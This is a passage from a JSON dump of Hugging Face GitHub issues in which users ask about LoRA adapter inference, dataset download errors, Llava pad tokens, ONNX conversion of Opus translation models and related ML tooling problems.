contribution\r\n\r\nHere is the SFTtrainer method i used for finetuning mistral\r\n```\r\ntrainer = SFTTrainer(\r\n model=peft_model,\r\n train_dataset=data,\r\n peft_config=peft_config,\r\n dataset_text_field=\" column name\",\r\n max_seq_length=3000,\r\n tokenizer=tokenizer,\r\n args=training_arguments,\r\n packing=packing,\r\n)\r\ntrainer.train()\r\n```\r\nI found different mechanisms for the finetuned model inference after PEFT based LORA finetuning\r\n\r\nMethod - 1\r\n\r\nsave adapter after completing training and then merge with base model then use for inference\r\n```\r\ntrainer.model.save_pretrained(\"new_adapter_path\")\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n new_adapter_path,\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\n\r\nMethod - 2\r\n\r\nsave checkpoints during training and then use the checkpoint with the least loss\r\n```\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n \"least loss checkpoint path\",\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\nMethod - 3\r\n\r\nsame method with AutoPeftModelForCausalLM class \r\n```\r\nmodel = AutoPeftModelForCausalLM.from_pretrained(\r\n \"output directory checkpoint path\",\r\n low_cpu_mem_usage=True,\r\n return_dict=True,\r\n torch_dtype=torch.float16,\r\n device_map=\"cuda\")\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-4\r\n\r\nAutoPeftModelForCausalLM class specifies the output folder without specifying a specific checkpoint\r\n```\r\ninstruction_tuned_model = AutoPeftModelForCausalLM.from_pretrained(\r\n training_args.output_dir,\r\n torch_dtype=torch.bfloat16,\r\n device_map = 'auto',\r\n trust_remote_code=True,\r\n)\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-5\r\nAll the above methods without merging\r\n```\r\n#finetuned_model = finetuned_model.merge_and_unload()\r\n```\r\n\r\nWhich is the actual method I should follow for inference?\r\nand when to use which method over another?", "url": "https://github.com/huggingface/peft/issues/1310", "state": "closed", "labels": [], "created_at": "2023-12-29T09:49:55Z", "updated_at": "2024-01-02T15:31:23Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/datasets", "number": 6542, "title": "Datasets : wikipedia 20220301.en error ", "body": "### Describe the bug\n\nWhen I used load_dataset to download this data set, the following error occurred. The main problem was that the target data did not exist.\n\n### Steps to reproduce the bug\n\n1.I tried downloading directly.\r\n```python\r\nwiki_dataset = load_dataset(\"wikipedia\", \"20220301.en\")\r\n```\r\nAn exception occurred\r\n```\r\nMissingBeamOptions: Trying to generate a dataset using Apache Beam, yet no Beam Runner or PipelineOptions() has been provided in `load_dataset` or in the builder arguments. For big datasets it has to run on large-scale data processing tools like Dataflow, Spark, etc. More information about Apache Beam runners at https://beam.apache.org/documentation/runners/capability-matrix/\r\nIf you really want to run it locally because you feel like the Dataset is small enough, you can use the local beam runner called `DirectRunner` (you may run out of memory). \r\nExample of usage: \r\n\t`load_dataset('wikipedia', '20220301.en', beam_runner='DirectRunner')`\r\n```\r\n2.I modified the code as prompted.\r\n```python\r\nwiki_dataset = load_dataset('wikipedia', '20220301.en', beam_runner='DirectRunner')\r\n```\r\nAn exception occurred:\r\n```\r\nFileNotFoundError: Couldn't find file at https://dumps.wikimedia.org/enwiki/20220301/dumpstatus.json\r\n```\r\n\n\n### Expected behavior\n\nI searched in the parent directory of the corresponding URL, but there was no corresponding \"20220301\" directory.\r\nI really need this data set and hope to provide a download method.\n\n### Environment info\n\npython 3.8\r\ndatasets 2.16.0\r\napache-beam 2.52.0\r\ndill 0.3.7\r\n", "url": "https://github.com/huggingface/datasets/issues/6542", "state": "closed", "labels": [], "created_at": "2023-12-29T08:34:51Z", "updated_at": "2024-01-02T13:21:06Z", "comments": 2, "user": "ppx666" }, { "repo": "huggingface/diffusers", "number": 6384, "title": "How to map A1111 reference_only parameters into diffusers?", "body": "Thanks for the community to implement the reference_only functionality in A1111, but how can the parameters correspond to each other? I have tried to reproduce the effect of webui in the diffusers library, but I can't seem to do it. I'm using the StableDiffusionReferencePipeline community pipeline.\r\n\r\nMy questions are:\r\n1. Is reference_only in A1111 equivalent to reference_attn=True, reference_adain=False? \r\n![image](https://github.com/huggingface/diffusers/assets/26246545/634e1501-0ce2-4c19-909f-a59416ba4008)\r\n2. Some parameters in A1111, such as starting control step, seem to have no corresponding parameters in the pipeline.\r\n![image](https://github.com/huggingface/diffusers/assets/26246545/1992c9b3-8d9e-43ee-9ea2-df78f7f5f1b1)\r\n3. The style_fidelity in A111 seems to have significant differences compared to style_fidelity in A1111.", "url": "https://github.com/huggingface/diffusers/issues/6384", "state": "closed", "labels": [ "stale" ], "created_at": "2023-12-29T08:16:15Z", "updated_at": "2024-01-28T15:29:43Z", "user": "Logos23333" }, { "repo": "huggingface/peft", "number": 1308, "title": "How to check the gradients of lora layers when training a peft model", "body": "### Feature request\n\nwhen I trained a lora model like this\r\n```python\r\nmodel = get_peft_model(model, lora_config)\r\ntraining(model,data)\r\n```\r\nHow can I check the gradients of lora layers from a `peft` model ?\n\n### Motivation\n\ncheck gradients of lora layers from peft model during training\n\n### Your contribution\n\nni", "url": "https://github.com/huggingface/peft/issues/1308", "state": "closed", "labels": [], "created_at": "2023-12-29T04:26:10Z", "updated_at": "2024-01-05T04:55:41Z", "user": "stardusts-hj" }, { "repo": "huggingface/transformers.js", "number": 484, "title": "TypeScript Pipline Types for different models?", "body": "### Question\n\nIs there a suggested way to get types for the different models? Right now after I create a pipline, like one of the following:\r\n\r\n```\r\nconst segmenter = await pipeline('image-segmentation', 'Xenova/face-parsing');\r\n// or \r\nconst extractor = await pipeline(`feature-extraction`, `Xenova/UAE-Large-V1`, {\r\n quantized: true, // Set this to false to use the full (unquantized) model\r\n});\r\n```\r\n\r\nAll the methods and returned values are `(...args: any[]) => any` - finding it hard to work with the methods and returned values.\r\n\r\nI realize each model returns different outputs, and I'm fairly new to the whole convertion process, but are these types kept somewhere in the Python or the json files with the model that could be used as typescript types? \r\n\r\nIdeally `pipeline` would infer the types, but I'm also ok with importing (or generating the types myself) and using it as a generic:\r\n\r\n```\r\nconst whateve = pipeline(`task`, `model`)\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/484", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-28T21:16:05Z", "updated_at": "2024-01-02T15:08:47Z", "user": "wesbos" }, { "repo": "huggingface/optimum-neuron", "number": 395, "title": "How to use generate() with inputs_embeds", "body": "I hope this is the right place to ask this question. Let me know if I need to move to another repo.\r\n\r\nCurrently I'm using `NeuronModelForCausalLM`.\r\n\r\nI have a use case where I need to be able to do the following:\r\n\r\n1. Generate embedding tokens\r\n2. Modify embedding tokens\r\n3. Run inference from modified embedding tokens\r\n\r\nI am able to do steps 1 & 2 currently using the following:\r\n```\r\nfrom optimum.neuron import NeuronModelForCausalLM\r\n\r\nllama_model = NeuronModelForCausalLM.from_pretrained('aws-neuron/Llama-2-7b-chat-hf-seqlen-2048-bs-1')\r\n\r\nembedded_tokens = llama_model.model.chkpt_model.model.embed_tokens(token_ids)\r\n\r\n### Code to modify embedded_tokens\r\n```\r\n\r\nHowever, as far as I can tell, generation with these modified tokens is not possible with `llama_model.generate()`\r\n\r\nWhen I use the 'input_embeds' keyword argument, and set `input_ids=None`, I get the following:\r\n```\r\nValueError: The following `model_kwargs` are not used by the model: ['inputs_embeds']\r\n```\r\n\r\nIf this is not possible with the NeuronModelForCausalLM.generate() currently, is there a way to work around this manually? If so, could you provide an example?\r\n\r\nThanks very much for your help! ", "url": "https://github.com/huggingface/optimum-neuron/issues/395", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-28T18:28:28Z", "updated_at": "2024-10-31T08:04:57Z", "user": "liechtym" }, { "repo": "huggingface/transformers.js", "number": 483, "title": "Unrecognized token '<' when running", "body": "### Question\r\n\r\nI downloaded the react translation example. When I start the app everything seems to render fine, but as soon as I press translate, nothing happens and I get this error in the console on the browser: \r\n`Unhandled Promise Rejection: SyntaxError: JSON Parse error: Unrecognized token '<'`\r\n\r\nI've gotten this same issue trying to run other models keeping things very basic as found here: https://huggingface.co/docs/transformers.js/pipelines\r\n\r\nUPDATE: This error only happens in Safari, but it works fine in Chrome. \r\n\r\nIf I try to make the simplest example with react like in the tutorial link it fails in both chrome and safari", "url": "https://github.com/huggingface/transformers.js/issues/483", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-28T14:44:50Z", "updated_at": "2023-12-28T20:35:02Z", "user": "philg-204" }, { "repo": "huggingface/transformers.js", "number": 482, "title": "How tot get the same output as the python library for the Resnet Model ?", "body": "### Question\r\n\r\nHi,\r\nI am trying to translate a python script to use it in my node server. Currently, I spawn a process to execute the python code, but I would like to improve response time by using the transformers.js version.\r\n\r\nMy problem is that I don't have the same output with the two codes. \r\n\r\nThe python output is a vector of dimension 2048\r\nThe js output is a vector of dimension 1000\r\n\r\nIt seems that my code has a problem as soon as the ImageProcessor step because the `inputs` are not equal\r\n\r\n\r\nPython code : \r\n```python\r\nimport torch\r\nfrom transformers import logging\r\n\r\nlogging.set_verbosity_error()\r\n\r\nfrom PIL import Image\r\n\r\n\r\nclass ImgToVec:\r\n def __init__(self, pretrained_model=\"microsoft/resnet-50\"):\r\n from transformers import AutoImageProcessor, ResNetModel\r\n\r\n self.pretrained_model = pretrained_model\r\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n self.image_processor = AutoImageProcessor.from_pretrained(pretrained_model)\r\n self.model = ResNetModel.from_pretrained(pretrained_model).to(self.device)\r\n\r\n def get_embedding(self, file):\r\n im = Image.open(file)\r\n inputs = self.image_processor(im, return_tensors=\"pt\").to(self.device)\r\n\r\n print(f\"inputs : {inputs} dimensiosn : {inputs['pixel_values'].size()}\")\r\n with torch.no_grad():\r\n outputs = self.model(**inputs)\r\n return outputs.pooler_output[0, :, 0, 0].tolist()\r\n\r\n# https://cdn-lfs.huggingface.co/repos/cf/db/cfdbeec4acf4145f96e47e07a9e161cade4dbce7cfad3ba24765bf1713d53ef3/d65b6f72943d5e2d4f7e5e4dedfb93aea0fbbda140ae7c3ee772124b579e07c4?response-content-disposition=inline%3B+filename*%3DUTF-8%27%27football-match.jpg%3B+filename%3D%22football-match.jpg%22%3B&response-content-type=image%2Fjpeg&Expires=1704020059&Policy=eyJTdGF0ZW1lbnQiOlt7IkNvbmRpdGlvbiI6eyJEYXRlTGVzc1RoYW4iOnsiQVdTOkVwb2NoVGltZSI6MTcwNDAyMDA1OX19LCJSZXNvdXJjZSI6Imh0dHBzOi8vY2RuLWxmcy5odWdnaW5nZmFjZS5jby9yZXBvcy9jZi9kYi9jZmRiZWVjNGFjZjQxNDVmOTZlNDdlMDdhOWUxNjFjYWRlNGRiY2U3Y2ZhZDNiYTI0NzY1YmYxNzEzZDUzZWYzL2Q2NWI2ZjcyOTQzZDVlMmQ0ZjdlNWU0ZGVkZmI5M2FlYTBmYmJkYTE0MGFlN2MzZWU3NzIxMjRiNTc5ZTA3YzQ%7EcmVzcG9uc2UtY29udGVudC1kaXNwb3NpdGlvbj0qJnJlc3BvbnNlLWNvbnRlbnQtdHlwZT0qIn1dfQ__&Signature=kWwcSkWcf8K62Tgr57HYD5VObZuozl3Jf%7EHV5alcyRA-gvbREfzgjMKU9rVOc84r0uwo9d3f-si-PoJ3GdyB8WObJFJWF0nE9SX5C-f3Nookj4SWevcJkLNgF27KqUPMhWWZ8B3KjEDvcxPirjHfc4fv87-uM%7EQIuazixgu0i8lXpzeSyKdZGNIc3zUG-hDzU3EKCGBWbwnGG9Yq%7Evz%7Eit-vvYc7i1AoYTAteZUP1ngDdywjwNf6VvvGqmyBdMcwVDiA0ShwAhW9Z3mqt%7EVz6HaYipWejY0mWmyVhyCWFtJOe9yrk%7ETJKr5cOV3yq6sM0jSheh3GuSd%7E2qYzjBsDVQ__&Key-Pair-Id=KVTP0A1DKRTAX\r\n\r\nresult = ImgToVec(\"microsoft/resnet-50\").get_embedding(\"./football-match.jpg\")\r\n```\r\n\r\nMy JS code : \r\n```ts\r\nclass ImgToVec {\r\n public async getEmbedding(\r\n file: string,\r\n pretrainedModel = 'Xenova/resnet-50',\r\n ): Promise {\r\n const { ResNetForImageClassification, AutoProcessor, RawImage } =\r\n await import('@xenova/transformers');\r\n\r\n const model = await ResNetForImageClassification.from_pretrained(\r\n pretrainedModel,\r\n );\r\n const imageProcessor = await AutoProcessor.from_pretrained(pretrainedModel);\r\n\r\n const image = await RawImage.read(file);\r\n\r\n const inputs = await imageProcessor(image);\r\n\r\n const outputs = await model(inputs, { config: { embeddingSize: 2048 } });\r\n\r\n console.log('inputs', inputs);\r\n\r\n const embedding: number[] = outputs.data;\r\n\r\n return embedding;\r\n }\r\n}\r\n\r\nconst imgToVec = new ImgToVec();\r\n\r\n// https://cdn-lfs.huggingface.co/repos/cf/db/cfdbeec4acf4145f96e47e07a9e161cade4dbce7cfad3ba24765bf1713d53ef3/d65b6f72943d5e2d4f7e5e4dedfb93aea0fbbda140ae7c3ee772124b579e07c4?response-content-disposition=inline%3B+filename*%3DUTF-8%27%27football-match.jpg%3B+filename%3D%22football-match.jpg%22%3B&response-content-type=image%2Fjpeg&Expires=1704020059&Policy=eyJTdGF0ZW1lbnQiOlt7IkNvbmRpdGlvbiI6eyJEYXRlTGVzc1RoYW4iOnsiQVdTOkVwb2NoVGltZSI6MTcwNDAyMDA1OX19LCJSZXNvdXJjZSI6Imh0dHBzOi8vY2RuLWxmcy5odWdnaW5nZmFjZS5jby9yZXBvcy9jZi9kYi9jZmRiZWVjNGFjZjQxNDVmOTZlNDdlMDdhOWUxNjFjYWRlNGRiY2U3Y2ZhZDNiYTI0NzY1YmYxNzEzZDUzZWYzL2Q2NWI2ZjcyOTQzZDVlMmQ0ZjdlNWU0ZGVkZmI5M2FlYTBmYmJkYTE0MGFlN2MzZWU3NzIxMjRiNTc5ZTA3YzQ%7EcmVzcG9uc2UtY29udGVudC1kaXNwb3NpdGlvbj0qJnJlc3BvbnNlLWNvbnRlbnQtdHlwZT0qIn1dfQ__&Signature=kWwcSkWcf8K62Tgr57HYD5VObZuozl3Jf%7EHV5alcyRA-gvbREfzgjMKU9rVOc84r0uwo9d3f-si-PoJ3GdyB8WObJFJWF0nE9SX5C-f3Nookj4SWevcJkLNgF27KqUPMhWWZ8B3KjEDvcxPirjHfc4fv87-uM%7EQIuazixgu0i8lXpzeSyKdZGNIc3zUG-hDzU3EKCGBWbwnGG9Yq%7Evz%7Eit-vvYc7i1AoYTAteZUP1ngDdywjwNf6VvvGqmyBdMcwVDiA0ShwAhW9Z3mqt%7EVz6HaYipWejY0mWmyVhyCWFtJOe9yrk%7ETJKr5cOV3yq6sM0jSheh3GuSd%7E2qYzjBsDVQ__&Key-Pair-Id=KVTP0A1DKRTAX\r\nimgToVec.getEmbedding('./football-match.jpg').then((embedding) => {\r\n console.log(embedding);\r\n});\r\n\r\n```\r\n\r\nAny ideas how to solve my problem please ?", "url": "https://github.com/huggingface/transformers.js/issues/482", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-28T11:38:20Z", "updated_at": "2024-01-10T15:04:22Z", "user": "Spoutnik97" }, { "repo": "huggingface/diffusers", "number": 6370, "title": "How to use diffusers lora in the AUTOMATIC1111 ", "body": "Thanks for your great work, I use the train_text_to_image_lora_sdxl.py to train my custom dataset and get these output, And I get the good result. But I want to use the AUTOMATIC1111 to use the lora weight, I move the pytorch_lora_weights to the AUTOMATIC1111 lora folder But get the error report:`AssertionError: conversion failed: lora_unet_input_blocks_4_1_transformer_blocks_0_attn1_to_k_lora_A_weight. the model may not be trained by `sd-scripts``\r\n![image](https://github.com/huggingface/diffusers/assets/18145013/561a8450-af71-460f-a091-78eb96dcea20)\r\nhow can I do to convert the lora model weight to which format AUTOMATIC1111 can accpet.\r\n", "url": "https://github.com/huggingface/diffusers/issues/6370", "state": "closed", "labels": [], "created_at": "2023-12-28T06:17:19Z", "updated_at": "2024-01-02T13:38:26Z", "user": "chongxian" }, { "repo": "huggingface/computer-vision-course", "number": 163, "title": "How to include \"What you'll learn\" section for this course?", "body": "Hello everyone, \r\nOur PR for Fundamentals of Computer Vision was merged a few days back. After that, one thing we still need to acknowledge based on your [feedback](https://github.com/johko/computer-vision-course/issues/38#issuecomment-1764502604) on our chapter outline is building a demo using Gradio to give learners a taste of what they'll learn. One of our teammates, @aman06012003 , created a simple [Cat vs Dog classifier deployed it on Hugging face spaces](https://ak0601-cat-dog-classifier.hf.space/), which we want you to take a look at and give feedback.\r\n\r\nOnce the demo is finalized, there are two ways to include it, referring to the [Hugging Face Audio Course](https://huggingface.co/learn/audio-course/chapter0/introduction). One is to create a new .mdx file in our fundamentals folder. The other is to create a new chapter - Welcome to the course, where we add what you'll learn, community notes, etc. We are still determining the optimal path, so please guide us. \r\n\r\nTeam members - @seshu-pavan , @bellabf , @aman06012003 \r\nbcc - @MKhalusova @johko @merveenoyan @lunarflu \r\n\r\nBest, \r\nFundamentals team ", "url": "https://github.com/huggingface/computer-vision-course/issues/163", "state": "closed", "labels": [], "created_at": "2023-12-27T12:41:26Z", "updated_at": "2024-04-26T13:36:59Z", "user": "seshupavan" }, { "repo": "huggingface/transformers", "number": 28260, "title": "How to set pad_token of Llava for batched generation and training?", "body": "Hello, @younesbelkada I'm trying to use Llava for batched generation, using the default pad_token. here is the script:\r\n```python\r\nimport json\r\nfrom PIL import Image\r\nfrom transformers import AutoProcessor, LlavaForConditionalGeneration,AutoTokenizer\r\nfrom torch.utils.data import Dataset,DataLoader\r\nimport torch\r\nimport os\r\nfrom tqdm import tqdm\r\nDATA_ROOT = \"/mnt/gozhang/code/LLaVA/playground/data/eval/mm-vet\"\r\nprocessor = AutoProcessor.from_pretrained(\"/mnt/gozhang/ckpts/llava-1.5-7b-hf\")\r\ntokenizer = AutoTokenizer.from_pretrained(\"/mnt/gozhang/ckpts/llava-1.5-7b-hf\")\r\n\r\nclass MMVetDataset(Dataset):\r\n def __init__(self,data_root) -> None:\r\n super().__init__()\r\n self.data_root = data_root\r\n with open(os.path.join(data_root, \"mm-vet.json\"), \"r\") as f:\r\n data = json.load(f)\r\n self.data = [(k,v) for k,v in data.items()]\r\n def __len__(self):\r\n return len(self.data)\r\n\r\n def __getitem__(self, index):\r\n return {'id':self.data[index][0],\r\n 'image':os.path.join(self.data_root,'images',self.data[index][1]['imagename']),\r\n 'question':\"USER: \\n\"+self.data[index][1]['question']+\" ASSISTANT:\"}\r\n\r\ndef collator(batch):\r\n ids = [b['id'] for b in batch]\r\n questions = [b['question'] for b in batch]\r\n images = [Image.open(b['image']) for b in batch]\r\n inputs = processor(text=questions,images=images,return_tensors=\"pt\",padding=True)\r\n return ids,inputs\r\n\r\nmodel = LlavaForConditionalGeneration.from_pretrained(\"/mnt/gozhang/ckpts/llava-1.5-7b-hf\",torch_dtype=torch.float16)\r\nmodel.to('cuda')\r\n#model.to(torch.float16)\r\ndataset = MMVetDataset(DATA_ROOT)\r\ndataloader = DataLoader(dataset,batch_size=16,collate_fn=collator)\r\nresults = {}\r\nbar = tqdm(total=len(dataset))\r\nmodel.eval()\r\nwith torch.inference_mode():\r\n for ids, inputs in dataloader:\r\n inputs.to('cuda')\r\n inputs['pixel_values'] = inputs['pixel_values'].half()\r\n outputs = model.generate(**inputs,temperature=0.2,do_sample=True,max_new_tokens=1024,use_cache=True)\r\n input_token_len = inputs['input_ids'].shape[1]\r\n responses=tokenizer.batch_decode(outputs[:, input_token_len:], skip_special_tokens=True, clean_up_tokenization_spaces=False)\r\n for id,res in zip(ids,responses):\r\n results[id]=res\r\n bar.update(len(responses))\r\nwith open('mmvet_result.json','w') as f:\r\n json.dump(results,f,indent=4)\r\n```\r\nBut when generating the fifth batch, it reports `RuntimeError: probability tensor contains either inf, nan or element < 0`. Then I try different pad_token, setting `processor.tokenizer.pad_token = processor.tokenizer.unk_token` (following the raw llava codebase), or `processor.tokenizer.pad_token = processor.tokenizer.eos_token`(following the common setting), or `processor.tokenizer.pad_token = processor.tokenizer.bos_token`(following this [issue](https://discuss.huggingface.co/t/llama2-pad-token-for-batched-inference/48020)). And I find that only setting pad_token to eos_token can avoid the error. \r\nI wonder what's the effect of different pad_token during batched generation, and what's the root cause of this error, and how to set the correct pad_token for training the model?", "url": "https://github.com/huggingface/transformers/issues/28260", "state": "closed", "labels": [], "created_at": "2023-12-27T12:17:02Z", "updated_at": "2024-02-05T02:43:32Z", "user": "TideDra" }, { "repo": "huggingface/transformers", "number": 28259, "title": "How to add new merge rules in AutoTokenizer", "body": "### Model description\n\nI'm training new tokenizer from llama2, however, it seems that BPE tokenizer will clear the origin \"vocab\" and \"merge\" dict, and the training result is highly bias in my own datasets (about 6M C function) with some ugly tokens.\r\n\r\nI wonder that is it possible to train a tokenizer from llama2 with the origin \"vocab\" and \"merge\" dict unchanged, only add some new vocab and merge rules from our datasets to support my requirement?\r\n\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/28259", "state": "open", "labels": [ "New model" ], "created_at": "2023-12-27T12:15:26Z", "updated_at": "2023-12-27T12:15:26Z", "user": "Sandspeare" }, { "repo": "huggingface/accelerate", "number": 2289, "title": "[QUESTION] why stage3_gather_16bit_weights_on_model_save is set to false no matter what value of it in deepspeed config", "body": "[`accelerator._prepare_deepspeed()`](https://github.com/huggingface/accelerate/blob/d08c23c20975f39393b431143237c193733e7bb8/src/accelerate/accelerator.py#L1464C13-L1464C82) looks to force the `stage3_gather_16bit_weights_on_model_save` to `false`, which should raise an exception in [`accelerator.get_state_dict()`](https://github.com/huggingface/accelerate/blob/d08c23c20975f39393b431143237c193733e7bb8/src/accelerate/accelerator.py#L2985C17-L2985C68). Additionally, [`trainer.save_model()`](https://github.com/huggingface/transformers/blob/c48787f347bd604f656c2cfff730e029c8f8c1fe/src/transformers/trainer.py#L2827C17-L2827C77) invoke above function, then catch this exception and raise another exception. Yet, the log seems totally fine. I'm confused... Why this happened?", "url": "https://github.com/huggingface/accelerate/issues/2289", "state": "closed", "labels": [], "created_at": "2023-12-27T10:04:28Z", "updated_at": "2024-01-05T06:59:16Z", "user": "LaniakeaS" }, { "repo": "huggingface/diffusers", "number": 6352, "title": "how to choose save precision for lora file in training", "body": "I'm confused about my lora precision(fp16,bf16,float) and whether i can choose precision about my lora weights. I searched for the params about the **StableDiffusionXLPipeline.save_lora_weights** function used to save lora in sdxl text2img training script and didnt find params like 'save_precision' or sth.\r\n\r\nanyone can help? thanks!\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/6352", "state": "closed", "labels": [], "created_at": "2023-12-27T09:02:47Z", "updated_at": "2023-12-28T08:21:29Z", "user": "DoctorTar" }, { "repo": "huggingface/transformers.js", "number": 481, "title": "Why do certain models not load?", "body": "### Question\n\nI was keen to try:\r\n\r\nhttps://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0\r\n\r\nI tried:\r\n\r\n```ts\r\nimport {\r\n AutoModelForCausalLM,\r\n AutoTokenizer,\r\n} from '@xenova/transformers';\r\n\r\nconst autoTokenizer = await AutoTokenizer.from_pretrained(\r\n 'Upstage/SOLAR-10.7B-Instruct-v1.0',\r\n);\r\n\r\nconst model = await AutoModelForCausalLM.from_pretrained(\r\n 'Upstage/SOLAR-10.7B-Instruct-v1.0',\r\n);\r\n```\r\n\r\nBut it fails with an error:\r\n\r\n```ts\r\nError: Could not locate file: \"https://huggingface.co/Upstage/SOLAR-10.7B-Instruct-v1.0/resolve/main/onnx/decoder_model_merged_quantized.onnx\".\r\n```\r\n\r\nIs this an error on my side, is the model incompatible, ... ?", "url": "https://github.com/huggingface/transformers.js/issues/481", "state": "open", "labels": [ "question" ], "created_at": "2023-12-27T01:44:52Z", "updated_at": "2024-05-10T18:21:57Z", "user": "adaboese" }, { "repo": "huggingface/peft", "number": 1298, "title": "[Question] What is the main difference between \"modules_to_save\" and \"target_modules\"?", "body": "Hi, in my work I need to add some special token to LLAMA, so I need to train the parameter of [\"embed_tokens\", \"lm_head\"] for both layers, what confuses me is that should I add this parameter to LoraConfig's \"modules_to_save \" or \"target_modules\"? Looking forward to your reply!", "url": "https://github.com/huggingface/peft/issues/1298", "state": "closed", "labels": [], "created_at": "2023-12-26T07:37:05Z", "updated_at": "2024-02-03T15:03:27Z", "user": "SatireY" }, { "repo": "huggingface/datasets", "number": 6534, "title": "How to configure multiple folders in the same zip package", "body": "How should I write \"config\" in readme when all the data, such as train test, is in a zip file\r\n\r\ntrain floder and test floder in data.zip", "url": "https://github.com/huggingface/datasets/issues/6534", "state": "open", "labels": [], "created_at": "2023-12-26T03:56:20Z", "updated_at": "2023-12-26T06:31:16Z", "user": "d710055071" }, { "repo": "huggingface/trl", "number": 1140, "title": "How to additional finetune with new data from previous adapter ?", "body": "Hi All, I have question about finetune. Currently I use SFTtrainer for finetuning Llama2-7b-chat model and save it in adapter format. The question is, In case of I want to additional finetune with new data from previous adapter, How I could to do. Normally I additional finetune by merge adapter with base model before finetune it. I'm not sure my method that i do is correct or not. Or have any other method that easily more than this.\r\nThank", "url": "https://github.com/huggingface/trl/issues/1140", "state": "closed", "labels": [], "created_at": "2023-12-25T04:19:34Z", "updated_at": "2024-02-01T15:05:24Z", "user": "SiraHaruethaipree" }, { "repo": "huggingface/optimum", "number": 1613, "title": "Convert opus translation to onnx and run inference from it", "body": "To convert I use this snippet\r\n```\r\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\r\nfrom transformers.models.marian import MarianOnnxConfig\r\nimport onnxruntime as ort\r\nmodel_ckpt = \"Helsinki-NLP/opus-mt-en-zh\"\r\ntokenizer = AutoTokenizer.from_pretrained(model_ckpt)\r\nref_model = AutoModelForSeq2SeqLM.from_pretrained(model_ckpt)\r\nfeature = \"seq2seq-lm\"\r\nonnx_path = f\"onnx/{model_ckpt}-{feature}/\"\r\n\r\n!python -m transformers.onnx --model={model_ckpt} --atol=1e-4 --feature={feature} {onnx_path}\r\n```\r\n\r\nTo inference (which is not running) I use this snippet\r\n```\r\nimport torch\r\nfrom transformers import AutoTokenizer, pipeline\r\nfrom optimum.onnxruntime import ORTModelForSeq2SeqLM\r\n\r\nmodel = ORTModelForSeq2SeqLM.from_pretrained(\"./onnx/Helsinki-NLP/opus-mt-en-zh-seq2seq-lm\")\r\n```\r\n\r\nThe error is \r\n```\r\nFileNotFoundError: Could not find any ONNX model file for the regex ['(.*)?decoder(.*)?with_past(.*)?\\\\.onnx'] \r\n```\r\n\r\nMaybe it tries to find model.onnx but in the folder there are 2 onnx : decoder_model.onnx and encoder_model.onnx\r\n\r\nI think the snippet is from 2022, Is there any changes ? \r\nThanks", "url": "https://github.com/huggingface/optimum/issues/1613", "state": "closed", "labels": [], "created_at": "2023-12-25T04:04:47Z", "updated_at": "2025-04-29T01:45:20Z", "comments": 5, "user": "x4080" }, { "repo": "huggingface/chat-ui", "number": 658, "title": "chat-ui do not support TGI http url when deploy publicly", "body": "hi @nsarrazin, the chat-ui works well locally\r\n~~~\r\n# .env.local\r\nendpoints: [{\"type\":\"tgi\",\"url\":\"http://127.0.0.1:8080/generate_stream\"}]\r\n~~~\r\n\r\nbut if deploy it in public, when chat from the external brower, get the 403 error:\r\n~~~\r\n403\r\nYou don't have access to this conversation. If someone gave you this link, ask them to use the 'share' feature instead.\r\n~~~\r\n\r\nthis issue may be related this issue https://github.com/huggingface/chat-ui/issues/364\r\n\r\nit seems that: chat-ui only support the https url, but the TGI only support the http url. it has conflicts. how to fix this? \r\n", "url": "https://github.com/huggingface/chat-ui/issues/658", "state": "closed", "labels": [], "created_at": "2023-12-25T03:08:10Z", "updated_at": "2024-04-25T16:27:52Z", "comments": 1, "user": "walkacross" }, { "repo": "huggingface/transformers.js", "number": 475, "title": "How to use your own models", "body": "### Question\n\nHey I really appreciate your work here!\r\n\r\nI'm very interested in setting up a perfect RAG pipeline / flow and therefore I need a good document extraction with table-transformers and layout detection. \r\n\r\nExample : \r\nhttps://github.com/deepdoctection/deepdoctection\r\n\r\nWhere I'd use \r\nhttps://huggingface.co/microsoft/layoutlmv3-base\r\n\r\nhttps://huggingface.co/microsoft/table-transformer-detection\r\n\r\nI could ask you if would add one of these but I want to try it myself.\r\nAs I understood I can use your script and deploy it on my huggingface.co so I could consume it, is this right? \r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/475", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-24T21:38:02Z", "updated_at": "2024-05-15T09:32:26Z", "user": "DomEscobar" }, { "repo": "huggingface/datasets", "number": 6530, "title": "Impossible to save a mapped dataset to disk", "body": "### Describe the bug\r\n\r\nI want to play around with different hyperparameters when training but don't want to re-map my dataset with 3 million samples each time for tens of hours when I [fully fine-tune SDXL](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_sdxl.py).\r\n\r\nAfter I do the mapping like this:\r\n```\r\ntrain_dataset = train_dataset.map(compute_embeddings_fn, batched=True)\r\ntrain_dataset = train_dataset.map(\r\n compute_vae_encodings_fn,\r\n batched=True,\r\n batch_size=16,\r\n)\r\n```\r\nand try to save it like this:\r\n`train_dataset.save_to_disk(\"test\")`\r\ni get this error ([full traceback](https://pastebin.com/kq3vt739)):\r\n```\r\nTypeError: Object of type function is not JSON serializable\r\nThe format kwargs must be JSON serializable, but key 'transform' isn't.\r\n```\r\n\r\nBut what is interesting is that pushing to hub works like 